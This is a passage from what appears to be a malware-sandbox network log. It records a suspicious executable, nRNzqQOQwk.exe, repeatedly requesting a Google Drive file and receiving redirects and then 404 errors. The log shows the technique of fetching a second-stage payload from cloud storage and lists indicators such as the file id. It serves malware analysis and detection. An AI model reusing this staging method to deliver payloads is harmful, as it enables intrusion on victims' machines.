                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:38 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uGy9kLlFJS_S_IyKbh_7nw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          18 | 192.168.11.20 | 49764 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:48 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:48 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7o-NnvPKV0dr57Kpt7IhMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          19 | 192.168.11.20 | 49765 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:49 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:49 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6arl5y70PQyRDrWNpMytZQSp4tzis-6_R2Kwf-yQJ2dC7eUDn8WCfRwRAe5XX_M7xNYxa-nI4
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:49 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-3X_gkwWtI59K738p9N7fqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:49 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LIkq1juYLzWLuUO1yDLxHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          20 | 192.168.11.20 | 49766 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:33:59 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-p5OmLvObTGCdQEuqDovSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          21 | 192.168.11.20 | 49767 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:00 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:00 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4ptTXBTBoCC7JBURVujK9C_kF1AF1JEv7GN8u5sT4ycQ-vETjaPrWByA3vdk1bNm5NwTMDXVc
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-qk5CtqYNXSJCBebOjSD41Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:00 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFCwUk4uPWS89TFPfuNYnw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          22 | 192.168.11.20 | 49768 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:11 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:11 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:11 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-K_xtmXyFA1BuaPieJEG-eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          23 | 192.168.11.20 | 49769 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:11 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:12 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4owAQ-rszhPRwGVnM8A0PHGiS_Wsxrq_Fg_ROtqV0ttHRoZRbUHzeLJRoGMtMwRS3w
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:11 GMT
                                                                          Content-Security-Policy: script-src 'nonce-gZFSwUHLrUXlEHG4bMp8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:12 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9RHdYss_H1b87bYcVqXAVA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          24 | 192.168.11.20 | 49770 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:22 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:22 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-bqzhcNfZNjYP9m0bB2gk2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          25 | 192.168.11.20 | 49771 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:23 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC56mYfJx7SXF7l10xCPbmiRpR_TcfO8qEGS9TjRAycG4fby3BcR9NAJkDYTbWEOI18y
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:23 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-M1v3c6y7Ku6SLrIGidpNMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5qXg7k-xuP0-LEW4imzAKg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          26 | 192.168.11.20 | 49772 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:34:33 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:34 GMT
